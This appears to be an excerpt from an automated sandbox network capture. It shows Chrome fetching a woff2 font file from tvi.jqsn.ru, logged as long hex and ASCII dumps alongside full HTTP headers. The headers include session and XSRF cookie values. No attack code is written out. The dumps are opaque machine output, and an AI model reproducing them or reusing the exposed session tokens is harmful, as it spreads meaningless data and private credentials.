                                                                                                                          2024-04-17 00:34:49 UTC1369INData Raw: 95 70 20 53 6c 19 74 61 f6 39 98 ab 7d 67 2f 46 d2 63 a5 b8 68 4b d5 bc 01 0f 2b f0 74 3c 22 75 ba da 09 2c 35 42 71 39 fa 7d 82 11 18 fd 0c e0 55 da 8b ca 9c 61 29 c0 59 00 4f 30 05 71 cc 8c 6f 85 b0 92 44 cb 97 56 8a 65 2c 85 8c 97 43 83 57 88 0e c2 87 c2 26 57 a3 3d 17 d1 47 bc b7 78 05 8d 7d 93 19 4d b5 3f 83 6e c2 97 42 2f 35 de 74 d3 5e f4 39 ff 11 7a a1 e7 db 00 aa 6a 1d 19 56 5a 57 86 48 dc 00 97 0c cb df 06 44 32 47 d0 be cf d6 47 e1 40 dc f0 9f e8 bc ef e6 e4 11 eb e1 13 bf 8f ec f1 0c fa c6 ab 90 aa 27 03 73 ec a2 5a 00 90 2e ee 04 71 d6 a8 af e9 82 6f 6a bb 7a 16 de dd 07 09 27 ab 4f 54 b9 aa 55 cd aa 5a fd 45 2d 01 d5 75 ea b0 3a a3 3e a3 38 d5 a4 ce 83 de 7c d0 df 97 52 70 75 94 92 c0 9f d8 51 f9 02 a8 d4 bf 0d 42 5d 85 3a 41 99 ea 04 a8 1d
                                                                                                                          Data Ascii: p Slta9}g/FchK+t<"u,5Bq9}Ua)YO0qoDVe,CW&W=Gx}M?nB/5t^9zjVZWHD2GG@'sZ.qojz'OTUZE-u:>8|RpuQB]:A
                                                                                                                          2024-04-17 00:34:49 UTC1369INData Raw: 8e b9 ae eb 4d da 65 6d 23 5a 45 19 72 e9 80 6d 69 e7 05 af 68 88 f0 2a d4 76 ad c7 7c 1f ec 64 0d e6 da 8e d6 f5 38 e4 8b 7e ab c6 f6 c6 d2 6b b5 cf fb cd 5c b4 6d cb 57 a9 0f f4 5b 6e d7 55 93 25 bb 26 53 db da 70 a3 d4 9a 79 f4 d1 ea 1d 1d 0a 89 06 56 47 5e e7 76 b8 6b e5 ac e0 7c 48 de 2b 45 89 29 90 4b bd fe 06 46 7b 14 75 5a 7d ac de 52 27 f5 1a 9c 39 86 da a5 f6 aa 77 20 cb 62 68 0f 34 06 da 9b 6d cb 57 8e 1f aa b3 6a 87 ab 1a 2d 95 b7 c3 cd ea 20 ec e4 20 e4 58 62 d2 a1 73 2d f1 c6 01 8c ad b5 af 0c 39 56 10 ed a5 c0 9e 8a b3 24 f8 b3 0c f5 67 3c dd 1c d1 67 f8 61 5f 6f 80 8a a5 f0 7d 7e b1 da 06 f4 6d c1 dd 15 e4 87 9e 7f a2 df d2 6b 3f 0a 7c 59 82 eb 55 1a 8e e3 93 ba 16 47 b5 11 ef f0 ef 6d 8b 2b d5 ea 7e 3c b9 4e 7f c7 25 1e 2d e8 5a 17 09 60
                                                                                                                          Data Ascii: Mem#ZErmih*v|d8~k\mW[nU%&SpyVG^vk|H+E)KF{uZ}R'9w bh4mWj- Xbs-9V$g<ga_o}~mk?|YUGm+~<N%-Z`
                                                                                                                          2024-04-17 00:34:49 UTC1369INData Raw: 80 ca 32 59 7b 6a 6e f7 6d 5b 92 8b 72 c3 ce f9 c3 32 35 bd 52 a0 bf e6 6c 82 c5 eb d5 aa 7a c4 66 bb ee d1 5c ea 0f 29 79 ed 35 12 eb 2b 21 2d df 14 64 1e d9 2e dd fc ea 2b 28 25 91 72 33 a7 5a e9 e0 0d 8a cc 2f bf 43 5b 6e b5 32 8b 32 b5 ad 73 1f f0 2d ac 85 ae 8d 09 96 1a 89 73 e7 91 65 d5 b6 66 8f a2 73 8d d1 3d 8d ab 6f bb 08 29 71 c1 88 90 33 d7 58 35 64 95 ce b7 a1 21 51 be 30 47 2d b2 0e b5 9e 1d 15 6d 0b c8 96 da fa a0 ca c3 08 65 c8 4a c2 22 b7 ca 90 fe 55 ad b1 5d 3d d7 69 66 d6 59 bb ac 92 9b df 5d b4 59 47 5b a0 d6 a0 36 4b 32 2b 43 f5 17 b3 12 b6 f2 f1 06 e4 bd 46 ab 26 29 ed db 72 c8 f9 8e 27 7c d5 c0 f4 66 7f a5 04 5d b9 a5 ae 07 5d 54 ee 76 a8 3c aa ab 4e c9 d2 8a a4 2a d8 25 df fe 6b 5b 14 2a 5b 9a db fb 4b 97 75 75 4a 65 c4 dc dd 6b 7f
                                                                                                                          Data Ascii: 2Y{jnm[r25Rlzf\)y5+!-d.+(%r3Z/C[n22s-sefs=o)q3X5d!Q0G-meJ"U]=ifY]YG[6K2+CF&)r'|f]]Tv<N*%k[*[KuuJek
                                                                                                                          2024-04-17 00:34:49 UTC1369INData Raw: d6 44 fa 08 30 01 9e fc 08 66 54 06 e8 43 9f 00 7a d1 51 d2 ff 53 e3 0c fc ba 97 82 80 09 f0 ee 44 97 c3 a7 7b 28 9b bb 70 17 ea c3 06 1b 94 ce 09 9c 40 bd d8 0b df 9f 0e df df 0d e7 49 dc 1d e7 c9 7c 09 f5 e4 00 a7 a2 67 0f 4e c3 fd 0c 86 3c b9 37 e7 d0 15 7c 25 5f 49 89 dc 8f af c6 9d 6b 78 20 75 e7 eb 78 10 65 f1 60 1e 49 c9 7c 3b 8f a6 4b f8 4e be 87 02 3c 86 c7 51 26 a2 09 ec 14 f1 e4 e7 d4 83 a7 f0 14 1a c8 53 79 2a f5 e6 a7 f8 29 4a e2 5f f0 2f 70 fe 34 3f 8d f3 5f f2 7f a2 cf 34 9e 46 5d f9 57 fc 2b 4a e3 67 f8 19 9c ff 9a 7f 8d f3 e9 3c 9d ae e1 19 3c 83 46 f1 4c 9e 49 f7 f0 2c 9e 45 63 78 36 cf a6 2b 79 0e cf a1 7e 88 59 cf 92 0f 51 eb 79 1c e7 f2 5c 1a cd f3 78 1e 0d e0 f9 3c 9f 46 f0 0b fc 5f d4 8d 17 f0 02 1a cc 0b 79 21 dd c0 8b 78 11 dd c6
                                                                                                                          Data Ascii: D0fTCzQSD{(p@I|gN<7|%_Ikx uxe`I|;KN<Q&Sy*)J_/p4?_4F]W+Jg<<FLI,Ecx6+y~YQy\x<F_y!x
                                                                                                                          2024-04-17 00:34:49 UTC1369INData Raw: eb e2 8b f3 3d d4 78 7b d0 09 56 fc 65 d3 59 e7 6c 68 71 b1 e9 f3 68 41 07 6e a4 2f 03 4c d7 60 46 90 ca 72 b2 58 c3 7a b9 a6 2b cf 74 fd a0 33 4e 44 a9 ae 2d 4e 41 a9 ae 18 37 d1 9d e6 2e 74 d3 dd e5 6e 96 9b e3 e6 b9 7b dc 7c f7 47 f7 94 57 c3 8b f0 ea 79 9e e9 6a e1 b5 2f d7 b5 f2 5f 75 55 fb 8b ae 81 a6 8b 60 a8 e9 52 99 2e 4d 84 e2 4d a6 2f 86 58 3a f1 f7 51 07 8a 8e 96 dd 16 0d 2b 1a 54 94 04 e7 22 8a ea f2 9f 23 98 50 be 0e 0e a6 06 63 83 93 03 e7 82 04 ce 04 7e 0d 14 06 32 02 63 02 ab 8f 3f 75 fc 49 ff 01 7f be 7f 07 f8 73 fc ab fc cb fc 63 fd f1 fe f8 a3 95 4a 9e aa 38 27 ec 40 58 be 75 35 c5 8a 4c 9b 39 e5 af cd 65 0b 47 f9 98 13 7c ad 34 70 06 da 4c 76 52 9c f9 65 db 65 ab 93 e6 2c 71 32 9d 2c 67 8d 93 e3 6c 74 f2 9c 5d ce 1e 27 df 29 70 0e db
                                                                                                                          Data Ascii: =x{VeYlhqhAn/L`FrXz+t3ND-NA7.tn{|GWyj/_uU`R.MM/X:Q+T"#Pc~2c?uIscJ8'@Xu5L9eG|4pLvRee,q2,glt]')p
                                                                                                                          2024-04-17 00:34:49 UTC1369INData Raw: d4 75 47 88 8f e7 77 42 0f dd 51 9c cd 88 38 a8 cf e1 0e 1e b3 ac 77 39 03 ed fa a0 0a 84 dc dd 00 40 ad d5 6a 55 ea c0 24 8c 0d 2c fc c3 3a d6 c0 7c c5 98 85 bf ae b0 7f be 52 18 66 cc 8d 3f c4 db f9 9d 77 d6 61 b3 70 83 df 29 3c 6a ff 92 e0 ce a2 f3 08 71 27 e1 19 7e 28 14 c5 a0 02 5b ae 1b 06 d4 cb 54 98 41 40 54 be 1d b1 2c 41 1c 79 97 ab 31 c7 11 da 60 1f 5c 11 1e e6 af 33 1a c2 62 c2 63 42 82 74 a1 fe a1 29 51 1a e8 94 ce 90 11 c1 e8 fd 55 ea 80 00 bd bf 37 63 34 e0 8c 2c 4b 66 9c d1 a8 95 de 18 b4 e7 f1 5f 17 9e 58 61 2b 29 ef 5e 51 bc fe dc 90 fd 36 83 e6 2f 1c 5a 74 1b c7 77 0f ae e9 11 3e e5 77 66 b6 ed ae 69 bf 2f 33 fd cc 8a 96 23 83 05 6c 79 fd bc 92 4e e1 a4 fd d1 ae ae a6 7e 61 39 a5 77 d3 e8 6d 7e 35 7f 04 19 50 ba 2d 25 32 c2 db 0b 46 11
                                                                                                                          Data Ascii: uGwBQ8w9@jU$,:|Rf?wap)<jq'~([TA@T,Ay1`\3bcBt)QU7c4,Kf_Xa+)^Q6/Ztw>wfi/3#lyN~a9wm~5P-%2F
                                                                                                                          2024-04-17 00:34:49 UTC1369INData Raw: 80 a2 1a 24 80 09 74 85 c9 1a 98 95 e5 48 3f e6 9f 4e f4 9b 3d f3 f5 93 af 57 bc dc 9b d3 1e ff e6 73 af 44 45 7c 0b 19 1f fc a6 f9 ad c3 6f 25 a7 7e a6 d3 5d 3b f0 5a e1 d1 86 71 d4 94 74 0a f7 33 a0 a7 0f 0a 42 19 b6 54 16 2c 07 a2 a5 45 93 a0 1d 24 3a db 88 1c cc 02 ad 6f a0 de 37 48 1b 64 d0 6a fd d5 c0 5d 18 50 87 c9 64 24 c2 03 28 ac 50 96 bb ef f8 1e 3c 28 7c 24 bc f6 92 80 47 fa cf 6c 9c 21 68 97 ad 5d b7 f4 2f ec 5f 77 ff 34 c9 7e 80 a9 b7 bf c0 ef cc ed 7b 44 f8 b2 bd ae ae 4d 78 98 cc b3 e4 d1 db 5c 3a d0 38 89 e8 df b0 50 15 cf 61 16 24 07 cb 32 cd 40 e4 00 51 7c 28 fa 37 2a 22 38 d0 d3 1d 25 e1 24 5e 11 20 11 ac 99 62 10 13 67 c9 2c 04 e9 1a 20 0a 5b 15 a1 23 19 7d 66 da c0 4b 7b 9a 7c 47 dc 32 2b ba b2 57 ae 78 7f 14 bd 3f 75 e5 33 ed 4f 7e
                                                                                                                          Data Ascii: $tH?N=WsDE|o%~];Zqt3BT,E$:o7Hdj]Pd$(P<(|$Gl!h]/_w4~{DMx\:8Pa$2@Q|(7*"8%$^ bg, [#}fK{|G2+Wx?u3O~
                                                                                                                          2024-04-17 00:34:49 UTC1369INData Raw: ef 40 62 d1 f9 7b 68 80 11 c0 39 21 d2 48 56 33 2d ac 8c 9d 9f af 3b 35 4d 38 8a 13 28 19 40 0a 94 cb 38 52 16 e5 36 17 46 65 64 09 d5 4d c9 71 d1 39 01 04 81 ca 48 6b f9 94 e9 cb 52 09 e1 22 7a 6d c6 e4 b0 f0 85 96 5c a2 d7 84 4a aa d7 d2 50 be 2d 27 19 f3 38 05 23 9e 29 23 5e 2a 55 8e 74 3a 06 96 83 71 81 5a 94 91 4d 4a 08 0f 03 db c2 c7 5d 85 d2 70 9a c3 c8 aa a2 8d 93 28 3e 95 5a 45 fe 3b 50 6b d7 92 2d d1 31 ee 01 1e f7 fd 6c 1b 51 87 4b ea eb 87 6c 21 42 79 43 c0 d4 a8 cc 34 85 6a 30 de 96 9e 0c 5c fd 20 68 c8 d6 71 1a f2 85 27 6e 36 04 64 45 65 36 a5 c8 54 24 fc da 02 f3 0d a4 20 f2 45 91 28 cb 66 06 9e 52 63 06 ac 77 62 1a 49 f2 56 e3 10 c0 f0 d3 12 cb 30 24 48 1b e9 17 a9 05 db d3 8d 58 e0 8e 3e b8 d6 68 31 63 c5 0f 27 83 fe d3 f1 be f8 92 25 63
                                                                                                                          Data Ascii: @b{h9!HV3-;5M8(@8R6FedMq9HkR"zm\JP-'8#)#^*Ut:qZMJ]p(>ZE;Pk-1lQKl!ByC4j0\ hq'n6dEe6T$ E(fRcwbIV0$HX>h1c'%c


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          33192.168.2.449776104.21.3.1474433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:48 UTC1402OUTGET /56VQuccXKefp045CypTXYc2st60 HTTP/1.1
                                                                                                                          Host: tvi.jqsn.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          Origin: https://tvi.jqsn.ru
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: font
                                                                                                                          Referer: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJ
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6ImJPUnlPaVpTVForUjBMMGVxWS9rUHc9PSIsInZhbHVlIjoiTjN1cWdhd0NoYWlaSTRPTnZqTU1hUXNEcXdGbisvcEVUbFcySGtsdzcvcGJnMlNLcmorTGk0V05uQmRqcUdsOHQwWlNXYjJOVGRmUDFWWTV0NVJlMDAydnUvTmFpS285R3ZZTmJPTFM5dVJHYlpaOC8zSUNRSEZGd1lDTlpBT3MiLCJtYWMiOiJlMTIwZjRlMTY2YTNhMmM1ODFlMjJlOGVkMWQxNmRhZDkxYmFhYTExZjczNzllOTljM2QwN2VjOGU5YmM1N2VjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IngvMStrOFpMeCt1dGpDcXFJV0JNTHc9PSIsInZhbHVlIjoiYWpZSUhBek5qQmI3UC8zVjN0NXhBc1J3a3BBNmJUWGFOMU5EWFYweWVSaHhkdHZlWUU0SHFKWTBwdDNvV2hXMCtab2o5QzlnWFFFdWozcXJXWmpEdGlUZnlGWkpidlRNYXRiL0xwekJsM2lFT2RWOHl4T1pVZzJ6cXFVcnd2T0kiLCJtYWMiOiI1ZWFmZDRhZTkwZGZhYjRkZDcxODFhMDkyZWVkODVlYTQ5ZDcwMDQ4Y2IwNTBiYTFhMmU5Yjk1ZTY2Njg3OGJmIiwidGFnIjoiIn0%3D
                                                                                                                          2024-04-17 00:34:49 UTC729INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:49 GMT
                                                                                                                          Content-Type: font/woff2
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Content-Disposition: inline; filename="56VQuccXKefp045CypTXYc2st60"
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YiotiZeptf1NYyjlSMeTs9P9KS%2FV%2BnDwdbx2eFQbDuibMedJIS%2FN1VbnUb%2F5%2FHZ4a2lKmmrfZ3JczZ2mNErWaep0xSoP1PvDijzXKC9FgRjp8YPYu7klr8Qct24Vdw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 875854ddfd8b080b-ATL
                                                                                                                          2024-04-17 00:34:49 UTC640INData Raw: 32 66 38 32 0d 0a 77 4f 46 32 00 01 00 00 00 00 6f a8 00 10 00 00 00 01 36 78 00 00 6f 47 00 01 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 81 bc 3e 1c 89 16 06 60 00 8e 3c 08 3c 09 97 62 11 08 0a 82 c0 68 82 a2 42 01 36 02 24 03 8e 78 0b 87 3e 00 04 20 05 8c 27 07 97 7b 0c 81 0d 5b 78 22 71 04 dd b6 5d c4 a2 0a ca 1b ec 97 68 4a b7 df b3 0a d8 b1 27 dc 0e e2 ce 96 b5 c5 0a 36 ae 32 bb 5b 95 0a ec 05 71 f6 ff ff 7f 7a d2 88 b1 6d 43 77 77 ff 00 08 2a a9 65 55 b0 0a 53 9a a2 10 14 ad 17 8a 9a 11 30 8d c1 53 1a 73 a6 e1 b6 2c ad b0 c2 e4 5c e5 65 96 de 46 b1 26 ef 94 d7 16 8d 6f 55 2a 52 1a 7d 51 f7 43 8e e7 32 b9 54 44 c8 b6 e1 0a d3 35 11 09 23 e7 fa 68 14 48 a4 32 ac 7c 3c e8 31 a3 7a a7 a2 5d cf 78 5a f4 95 0f 7a 9d f0 7a b2 e4
                                                                                                                          Data Ascii: 2f82wOF2o6xoGB>`<<bhB6$x> '{[x"q]hJ'62[qzmCww*eUS0Ss,\eF&oU*R}QC2TD5#hH2|<1z]xZzz
                                                                                                                          2024-04-17 00:34:49 UTC1369INData Raw: 2f 4e 54 b7 a5 f4 aa 4b c6 dd fb f0 6b ea fb 41 a4 cb 05 10 da 8e a0 c6 cc a9 09 d9 ff 55 35 53 96 3d cb 74 5b 86 29 2f 73 d6 52 b7 eb a5 c9 f6 dd b9 17 b5 46 99 94 29 36 48 20 41 01 d4 27 3f 21 fe f9 e7 a8 dd 37 53 d1 b2 ab a4 89 15 77 3a de 8e 25 92 48 96 40 d1 08 b6 6c 3f ff 03 00 6c 6d 16 ef 6c 55 64 20 44 fe 99 a9 2d af 00 fe 0b 20 00 9e 7f f7 d3 db e4 35 29 e5 97 60 00 e0 77 26 a7 ec 8c 51 bd 04 a5 aa 2d c9 13 20 11 06 0d 39 e4 58 74 9e 2f 53 51 3f 14 73 2b 75 0c 39 ee 1f 5c b1 68 d4 6c b0 47 cb 23 fc 2a a7 d5 23 40 83 46 d2 88 c9 66 c5 31 84 66 01 9d 3d 60 1f f0 e3 f1 70 ca 0b 01 a0 c2 94 3d 63 f0 be d9 92 66 3d 9c eb 70 20 34 42 79 0e 75 ff 7a 27 cb 0f ee 24 3b 04 73 b6 a4 dd 16 db 7a d0 f6 e3 e3 12 58 be c5 6e 36 79 2d e0 06 b4 05 18 a1 7f b4 fd
                                                                                                                          Data Ascii: /NTKkAU5S=t[)/sRF)6H A'?!7Sw:%H@l?lmlUd D- 5)`w&Q- 9Xt/SQ?s+u9\hlG#*#@Ff1f=`p=cf=p 4Byuz'$;szXn6y-
                                                                                                                          2024-04-17 00:34:49 UTC1369INData Raw: 30 d5 04 14 00 26 1a 2c 0b 54 b2 80 cb 34 90 36 a9 da b5 c2 17 d7 d5 c7 90 71 2b cd 8a 60 60 37 d2 71 3f 7f f5 e7 60 9b f1 b9 00 cd d2 45 52 22 f4 ee 56 07 ac a1 1f 48 86 e6 07 d6 ad 42 75 b7 65 82 d8 84 02 a2 da 84 a1 5c 49 4e 75 af 8f c3 b7 ea f1 a2 94 58 66 80 80 6c 25 f3 d8 75 af ac f0 67 57 7b 6a 37 a8 f2 f0 68 7a 37 c0 f7 bd 4d be ef 69 9d 44 eb 95 0e 88 ec 30 d0 66 50 36 51 17 59 8c ca 45 0b 23 fa 81 55 bc 59 5f 55 fe a0 40 a1 20 35 57 9b d4 3c b9 b3 29 ed a7 16 d3 13 45 0b c5 4c 25 f1 30 23 97 d9 4e bd 28 ab 1d d0 c2 14 6f c9 61 f9 56 40 1e 2b aa 69 29 e1 5a 15 f9 c1 0e 10 e8 40 d0 3a 0c 29 8c a9 39 12 e8 b0 01 e8 f6 ee 52 ab d2 f0 06 94 a4 e3 89 30 00 08 57 44 ed a2 83 bc a0 e0 07 54 5b 4d 54 db a3 29 51 e2 43 bf 56 c9 5a 96 e8 1f 92 c0 20 b0 78
                                                                                                                          Data Ascii: 0&,T46q+``7q?`ER"VHBue\INuXfl%ugW{j7hz7MiD0fP6QYE#UY_U@ 5W<)EL%0#N(oaV@+i)Z@:)9R0WDT[MT)QCVZ x
                                                                                                                          2024-04-17 00:34:49 UTC1369INData Raw: 2f 64 4e 3a 81 5d c8 fe 5d c3 7d 8e 8c 32 48 83 77 0d 90 7b 13 d2 57 6e b0 06 4d 75 68 c5 55 77 d5 35 f8 49 26 62 3d d6 a4 e2 ca 23 21 a6 56 a3 4f be 0e 7f 36 9d 5e 71 0c a3 03 92 78 3a c4 c9 65 66 ff 5b b5 c9 5d 7f 97 9a b0 d0 cb 2b a9 2b c6 f5 9c 64 17 83 0b ca ab 0c f2 a6 37 19 bb 54 19 0c 61 de e5 05 7e 1d dd 82 1b f9 eb e4 a2 3b c2 fb bf fc 8c 82 bb fa 9b 75 db a1 66 75 c9 75 d3 64 f1 8c aa ea bf de f8 8f 20 f3 86 3a ba e8 43 54 6a 8a 28 69 af 3c e6 ea b6 b2 5d 1b f8 18 09 92 64 e8 bd 0a 1d e0 d3 ba bc 10 cc cb 06 57 5c 77 bd a9 1a 44 81 23 b1 00 73 e8 10 9d bc f0 cc 39 be 92 1c 86 29 96 14 29 84 bf f5 e6 98 7e 7c d5 7f bf fc c3 77 d3 3c 9d cf ff 57 80 cf 97 9a d9 60 5e bd 00 ef d9 ff 57 bb 7c 10 17 61 91 5f e2 e0 bf 67 17 38 6d 72 f7 c0 87 b9 c7 2b
                                                                                                                          Data Ascii: /dN:]]}2Hw{WnMuhUw5I&b=#!VO6^qx:ef[]++d7Ta~;ufuud :CTj(i<]dW\wD#s9))~|w<W`^W|a_g8mr+
                                                                                                                          2024-04-17 00:34:49 UTC1369INData Raw: 80 e0 6a bb c0 a0 88 c4 aa 19 91 8f b2 3a 86 a1 c7 51 94 8d 27 34 7e 93 6d 79 84 7f 22 72 18 a7 cd 70 05 69 e3 44 db f8 ff af 9e d4 85 b4 cd e2 18 d5 3f 96 c3 09 cf c6 e4 5c 6d 0a 06 af 81 a3 25 42 c5 20 cd b7 cb aa a1 25 e4 61 93 4d 79 d2 4c 04 ae d7 c0 67 c6 a8 b1 07 00 76 2c 87 64 92 61 c8 f2 82 94 2e 87 d9 21 19 8d f3 72 4e db 0c 09 37 5f 5d ca 6d 2a c2 93 2c 7c e1 4f 0a f5 78 68 ed f3 95 63 92 85 c2 64 da 80 92 57 22 90 60 5c e2 76 78 80 a3 e7 17 e6 65 84 d8 68 fc 45 39 36 9d b6 bd 10 a7 d5 3c 40 98 a4 95 3d 2f 5c b2 3e 4f 05 c0 c6 03 43 4f 91 c1 b6 2a 1c ab 73 0f 48 30 21 8e 1a d3 24 e5 69 1b 45 37 55 e3 c4 1b 70 81 70 c6 8e c3 c7 15 fd d0 6a 42 d4 1a 9b 2c 71 78 1c 68 90 8e 66 52 12 59 39 ec 05 60 4b 10 46 0a d3 3b 4f 93 e9 9c 42 34 fe 5a 4c 23 c9
                                                                                                                          Data Ascii: j:Q'4~my"rpiD?\m%B %aMyLgv,da.!rN7_]m*,|OxhcdW"`\vxehE96<@=/\>OCO*sH0!$iE7UppjB,qxhfRY9`KF;OB4ZL#
                                                                                                                          2024-04-17 00:34:49 UTC1369INData Raw: 55 e0 cd 67 bf 4b 1a d6 82 d7 89 ec 04 00 58 23 21 bb 6d 36 82 f9 8a 2d e1 26 a5 61 bc c8 04 cc 05 ba 85 e5 2c 6d c3 f1 f3 38 00 35 ca 8a 94 b6 b9 45 01 63 8d f5 42 26 23 2b 8f 9e 00 a8 57 ae 4c 7a d7 ca b4 6a 9a 6e 68 45 cb 7a 73 ec ec ca 6a 1d 9c 93 ed e0 d0 ee f2 22 bb e4 a0 57 78 d2 d0 d0 81 98 be 92 68 36 2a 35 6b 19 7e a7 38 2a 13 91 05 2e 44 bf ef c7 df 5e 30 2e a5 1f cd 43 40 1e 70 cc f3 0a 36 82 72 f9 89 38 79 b0 a5 24 70 54 fe 74 60 c5 01 22 5e b9 e6 19 a1 43 02 57 17 2b 13 89 c3 3d af 86 3d 5b 59 ec d0 9d 86 23 f9 67 f1 fb 3a 58 07 48 c6 63 87 75 a2 a8 0c 94 5b bc 1e 8e 82 53 19 0c 24 da 49 3c 17 4c 27 29 d9 9d 80 57 5a ab 4f 76 b1 d5 d5 66 d6 cd 0b 43 de c4 07 9d fb 6a 3d 35 5d 05 18 4d fc cf f3 d5 52 8a 37 07 16 7b c0 bd 19 bc 8f 5b ba 06 00
                                                                                                                          Data Ascii: UgKX#!m6-&a,m85EcB&#+WLzjnhEzsj"Wxh6*5k~8*.D^0.C@p6r8y$pTt`"^CW+==[Y#g:XHcu[S$I<L')WZOvfCj=5]MR7{[
                                                                                                                          2024-04-17 00:34:49 UTC1369INData Raw: 98 b8 c4 dd 5e c3 fd c4 bb 2b 59 77 5f f3 fd 05 45 0f 85 b7 29 ba 15 d0 37 36 f5 56 d2 53 71 9f 74 80 7c 2b 6a a8 8a 41 ca 87 09 70 4e 7c 10 d3 48 b5 c1 ea 46 a9 1f cd 1a ca 3c 46 c3 38 b6 30 91 6e ca 9d a8 73 82 b6 68 5d 93 34 4f 16 ea 4b e5 09 46 a7 1b 53 97 6a 7a 86 a9 74 33 9a 33 f4 dd 17 ce 9f 8d 11 eb 17 13 fc ce e5 66 61 03 b5 46 e9 89 d1 1b ab 7b 8a be a9 a2 c5 b8 43 ea 57 b3 bc 10 37 82 25 84 7d 6c eb e6 e6 16 e5 cc a2 be 5d 7f 9c 81 78 43 89 26 d3 24 7b 66 a6 e7 a6 78 6a 9a 55 d3 3d 36 c3 13 cb bc b7 a6 03 56 fb 2f cd 7d 12 13 c0 38 5c 55 a0 e1 24 e3 29 0d 8d ab 57 ae 5a f3 da 99 73 6a ff 83 13 79 f9 de ad a4 cd b6 da 6b 75 de 3c 4e 5d ab ad 29 8e bd e8 f4 90 28 0f 5f 6c f3 f3 71 f4 b1 c7 9f 78 f2 a9 a7 9f e1 41 ca f5 83 8e 3b ef 36 73 5a b5 d9
                                                                                                                          Data Ascii: ^+Yw_E)76VSqt|+jApN|HF<F80nsh]4OKFSjzt33faF{CW7%}l]xC&${fxjU=6V/}8\U$)WZsjyku<N])(_lqxA;6sZ
                                                                                                                          2024-04-17 00:34:49 UTC1369INData Raw: 41 78 9a e0 f5 4b 20 21 68 28 a1 04 43 cc b3 da 4c c4 22 77 ea 2d 86 02 b7 12 c4 07 a7 6e 29 59 2e ed e5 5b 9c 19 24 53 e7 65 8d 02 f8 6b 73 ca d4 3d 31 2c 42 fd 94 37 14 8f 1b c6 ce 0a a6 4e 63 f7 b4 dc c9 ea 4b d7 22 b2 7d cb a9 96 d5 da ca 50 6b 69 5e 7f d7 75 c8 39 42 55 03 f2 3e 12 85 96 02 38 35 49 a6 80 15 1d 11 77 28 e7 e2 34 0b 2d ab af a9 57 67 f7 51 bd 61 37 69 bc 69 4b 76 78 bf 58 39 1e 64 1d 8e 2d 52 6f f1 43 6b ea a6 58 f8 13 68 45 70 b2 db 5a 4d d1 66 ac 0c bc b8 74 db ad f6 4c df 84 10 7c 9b 9c ea 48 0d 9c 0e 4c d5 de a5 81 a8 4e 91 7e be 3d c8 de d1 df a1 59 98 3a 2d 47 0e ae f9 33 c0 16 17 db ed 6f c8 04 34 b3 31 0a 82 b1 49 41 13 32 21 98 26 40 6b 46 10 cc 4d d0 02 82 65 02 75 ad 08 82 b5 09 da 40 b0 4d 80 d2 8e 20 d8 9b a0 03 04 c7 04
                                                                                                                          Data Ascii: AxK !h(CL"w-n)Y.[$Seks=1,B7NcK"}Pki^u9BU>85Iw(4-WgQa7iiKvxX9d-RoCkXhEpZMftL|HLN~=Y:-G3o41IA2!&@kFMeu@M
                                                                                                                          2024-04-17 00:34:49 UTC1369INData Raw: 27 e9 f0 07 62 5d 42 8e b9 0c 3b e3 23 94 ef fd b5 33 02 b3 cd a6 3c 99 f1 f6 84 a6 db 34 19 57 b5 92 7c e9 51 47 8c 7b 09 ee 9c 9c 39 3b b7 21 a8 05 e9 15 66 d0 8e 90 90 6b 92 7f 10 2d de 03 75 06 ca d0 20 71 ec b1 2c 2d d1 5c 51 3a a5 c3 64 5d fd f0 8e 61 4b 38 68 2c c9 64 fd 36 d4 2b 8d 9f 6d 59 11 8e 5b 9d 42 0c 7c 39 12 34 18 9e c9 86 8a fb 19 1b 9a 4e 20 d9 ad ef 8f d4 83 74 ce bb a7 2e 77 88 ac c3 8d 0f b2 51 bb 08 c0 b8 d9 ad 54 c6 3f f5 45 b6 35 f7 cb 1c cb 38 c1 a2 9a 9b bb 68 e1 2e a8 d4 0d b2 c4 ad c9 e2 ab a1 8d df 65 cf 1b 09 af e5 6d 50 2f b2 bc d5 91 41 8b 0c 3c 2c db 32 2a a4 e0 28 ad 42 06 2b ca c1 98 40 6d ea 72 b4 be d5 41 a6 7d 2b 6b 37 24 85 3a 61 fd 7c 04 75 c4 5f a6 e5 5d 66 a6 df a4 f5 e8 28 89 3d ab 0b 0c 6c b4 d2 a8 77 7e 3e 40
                                                                                                                          Data Ascii: 'b]B;#3<4W|QG{9;!fk-u q,-\Q:d]aK8h,d6+mY[B|94N t.wQT?E58h.emP/A<,2*(B+@mrA}+k7$:a|u_]f(=lw~>@
